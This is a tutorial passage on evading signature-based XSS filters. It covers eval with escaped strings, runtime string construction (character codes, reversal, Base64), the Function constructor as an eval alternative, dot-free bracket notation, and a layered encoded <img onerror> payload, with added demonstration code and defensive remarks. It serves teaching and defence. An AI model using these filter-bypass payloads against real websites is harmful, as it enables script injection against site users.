Bypassing Signature-Based XSS Filters: Modifying Script Code
If you can call eval, possibly by using the preceding technique to escape some of its characters so that the name passes the filter, you can execute arbitrary code by passing it to eval in string form.
This allows you to use various string manipulation techniques to hide the code you are executing from a signature-based filter, because only the string that finally reaches eval has to be valid JavaScript; the payload the filter inspects does not.
Furthermore, superfluous backslash escapes within string literals are ignored, so 'al\ert' is the same string as 'alert'. The letters that form recognised escapes, such as \b, \n, \r, \t, \u and \x, are the exception: those produce a different character, or a syntax error, rather than being dropped.
You can use sites such as Hackvector to help convert your payloads before testing them in your browser's web console.
Dynamically Constructing Strings
You can use other techniques to dynamically construct strings to use in your attacks, for example:
In the screenshot, the payload is being tested in the Firefox web console.
This example decodes a Base64-encoded command at runtime before passing it to eval, so the command itself never appears in the payload.
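The following is an added example, not code from the original page, showing three ways of constructing the string at runtime so that the text a filter would match never appears literally in the payload: from character codes, from a reversed copy, and from Base64. It runs in Node as well as in a browser console; "probe" is a hypothetical harmless sink standing in for alert(), which does not exist outside a browser, and the helper names (run, charCodePayload, reversedPayload, base64Payload) are this example's own.

```javascript
// Added example, not code from the original page. "probe" is a hypothetical
// harmless sink standing in for alert(), which does not exist in Node.
function probe(x) {
  return "probe called with " + x;
}

// A direct call to eval inside this function sees the enclosing scope, so the
// dynamically built string reaches probe() just as it would reach alert() in a
// page.
function run(code) {
  return eval(code);
}

// Technique 1: rebuild any source text from its character codes, so none of the
// words a signature-based filter looks for ("alert", "probe", ...) appear in the
// payload. Works for arbitrary input, not only the example command.
function charCodePayload(src) {
  const codes = Array.from(src, (c) => c.charCodeAt(0)).join(",");
  return "eval(String.fromCharCode(" + codes + "))";
}

// Technique 2: store the text reversed and restore it at runtime. JSON.stringify
// produces a correctly quoted JavaScript string literal for any input.
function reversedPayload(src) {
  const rev = JSON.stringify(src.split("").reverse().join(""));
  return "eval(" + rev + ".split('').reverse().join(''))";
}

// Technique 3: Base64. The attacker precomputes the encoding offline, as the
// screenshot's payload does; "cHJvYmUoMSk=" is btoa("probe(1)"). atob() exists
// in every browser and in Node >= 16.
const base64Payload = "eval(atob('cHJvYmUoMSk='))";

// Every variant hands the identical decoded string to eval, so all three behave
// exactly like eval("probe(1)"):
//   run(charCodePayload("probe(1)"))
//   run(reversedPayload("probe(1)"))
//   run(base64Payload)
```

The point for a defender is the same in all three cases: because decoding happens inside the JavaScript engine after the filter has run, a signature on the decoded text cannot fire; the only reliable controls are output encoding at the injection point and a Content Security Policy that forbids eval and inline handlers.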
Alternatives to eval
If direct calls to eval are not possible, there are other methods you can use to execute code supplied as a string:
If the dot character is being blocked, you can use other methods to perform your attack:
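As an added example that is not part of the original page, the block below shows two alternatives to a direct eval call (the Function constructor, and reaching Function through an array's constructor chain) and then rewrites the same attack without a single dot, using bracket notation and a runtime-built property name. In a browser, setTimeout('...') and setInterval('...') also accept code as a string, and assigning a javascript: URL to location runs it on navigation; those are not included because they only work inside a page. "probe" is a hypothetical harmless sink standing in for alert(); it is attached to globalThis, the standard name for the global object (window in a browser), because code compiled by Function runs in global scope. The function names are this example's own.

```javascript
// Added example, not code from the original page. "probe" is a hypothetical
// harmless sink standing in for alert(). It is attached to globalThis (which is
// window in a browser) because Function-compiled code runs in global scope and
// must find the sink there, just as a real payload finds window.alert.
globalThis.probe = function (x) {
  return "probe called with " + x;
};

const CODE = "return probe(1)"; // the command, in string form

// Alternative 1: the Function constructor compiles a string into a function;
// calling the result runs the code. No eval identifier appears anywhere.
function viaFunctionConstructor() {
  return Function(CODE)();
}

// Alternative 2: reach Function without naming it. Every array's constructor is
// Array, and Array's own constructor is Function.
function viaArrayConstructor() {
  return [].constructor.constructor(CODE)();
}

// Dot blocked: bracket notation replaces every property access. The property
// names are ordinary strings, so any of the string-building tricks from the
// previous section can be applied to them as well.
function dotFree() {
  return []["constructor"]["constructor"](CODE)();
}

// Dot blocked and the sink's name blocked too: rebuild the name at runtime and
// look it up on the global object, still without a dot or the word "probe".
function dotFreeIndirect() {
  const name = "eborp"["split"]("")["reverse"]()["join"]("");
  return globalThis[name](1);
}

// All four return "probe called with 1".
```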
Combining multiple techniques
The techniques described so far can often be used in combination to apply several layers of obfuscation to your attack.
In this example the "e" character in "alert" has been escaped using a Unicode escape (\u0065), and the backslash that introduces the Unicode escape has been HTML-encoded as &#x5c;. The browser's HTML parser decodes the character reference when it reads the attribute value, so by the time the JavaScript engine sees the handler the backslash has been restored, and the string passed to eval is 'alert(1)':
<img onerror=eval('al&#x5c;u0065rt(1)') src=a>
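The block below is an added example, not code from the original page. It walks the attribute value of that payload through the two decoding stages the browser applies in order (HTML character references first, JavaScript string escapes second), and it also checks the claim made earlier that superfluous backslashes are ignored, including the letters for which that is not true. The HTML decoder handles numeric references only, which is all the payload needs; alert is replaced by a local stub because Node has no alert(), and the function names (htmlDecodeAttribute, runHandler, detonate, escapeIsIgnored) are this example's own.

```javascript
// Added example, not code from the original page. alert is replaced by a local
// stub so the payload can be detonated outside a browser.
function alert(x) {
  return "alert fired with " + x;
}

// Stage 1 (HTML parser): decode numeric character references, decimal (&#92;)
// and hexadecimal (&#x5c;), in an attribute value. Named references such as
// &amp; are not handled here; the payload under discussion does not use them.
function htmlDecodeAttribute(value) {
  return value.replace(/&#(x[0-9a-f]+|[0-9]+);/gi, (match, ref) => {
    const isHex = ref[0].toLowerCase() === "x";
    return String.fromCharCode(isHex ? parseInt(ref.slice(1), 16) : parseInt(ref, 10));
  });
}

// Stage 2 (JavaScript engine): run the decoded handler. A direct eval sees the
// local alert() stub, as the real handler would see window.alert.
function runHandler(js) {
  return eval(js);
}

// The onerror attribute value from the payload above: the backslash of the
// Unicode escape is HTML-encoded, so neither "alert" nor "\u0065" appears in it.
const HANDLER_ATTR = "eval('al&#x5c;u0065rt(1)')";

function detonate(attr) {
  const js = htmlDecodeAttribute(attr); // eval('al\u0065rt(1)') once decoded
  return runHandler(js);                // eval resolves \u0065 -> 'e', then runs alert(1)
}

// Does '\<letter>' in a string literal simply yield the letter? True for
// letters with no escape meaning ('e', 'p', 'z' ...); false for the real
// escapes: \b \f \n \r \t \v and \0 produce other characters, and \x or \u
// without the required hex digits are syntax errors (caught here). Inside a
// template literal an unknown escape like `\e` is a syntax error as well.
function escapeIsIgnored(letter) {
  try {
    return eval("'\\" + letter + "'") === letter;
  } catch (e) {
    return false;
  }
}
```

Because the decoding order is fixed by the browser, a filter that inspects the raw attribute text must apply the same stages in the same order before matching; inspecting only one stage, or matching on the encoded text, is exactly what this layered payload defeats.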